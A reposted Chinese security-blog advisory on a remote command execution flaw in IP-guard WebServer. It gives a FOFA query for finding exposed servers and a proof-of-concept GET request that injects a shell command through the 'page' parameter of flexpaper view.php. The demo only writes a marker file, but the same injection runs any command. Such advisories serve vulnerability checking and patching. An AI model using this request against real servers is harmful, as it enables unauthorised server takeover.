IP-guard WebServer 远程代码执行漏洞

admin 2023年11月12日09:30:29评论60 views字数 1054阅读3分30秒阅读模式

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


IP-guard WebServer 远程代码执行漏洞

一、漏洞描述

IP-guard信息防泄露解决方案,不仅为防止信息通过U盘、Email等泄露提供解决方法,更大的意义在于,它能够帮助企业构建起完善的信息安全防护体系。通过详尽细致的操作审计、全面严格的操作授权和安全可靠的透明加密三重保护全面保护企业的信息资产,使得企业实现"事前防御—事中控制—事后审计"的完整的信息防泄露流程,信息安全防护无懈可击。

IP-guard WebServer 存在远程代码命令执行漏洞,通过此漏洞攻击者可以执行远程命令,操控服务器。

IP-guard WebServer 远程代码执行漏洞

二、网络空间搜索引擎查询

fofa查询

app="IP-guard" && icon_hash="2030860561"

IP-guard WebServer 远程代码执行漏洞

三、漏洞复现

POC

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=||echo+This%20website%20has%20vulnerabilities+%3E11.txt HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: ipg_session=1ee3212ad0cc6650bb92892f5faf668d58054772; PHPSESSID=d2b37e80dc2216e7dfd0fdbc611a36cdDNT: 1Connection: closeUpgrade-Insecure-Requests: 1

返回信息如下

IP-guard WebServer 远程代码执行漏洞

然后再访问路径

/ipg/static/appr/lib/flexpaper/php/11.txt

文件若存在,则证明漏洞存在

IP-guard WebServer 远程代码执行漏洞


原文始发于微信公众号(网络安全透视镜):IP-guard WebServer 远程代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月12日09:30:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   IP-guard WebServer 远程代码执行漏洞http://cn-sec.com/archives/2198203.html

发表评论

匿名网友 填写信息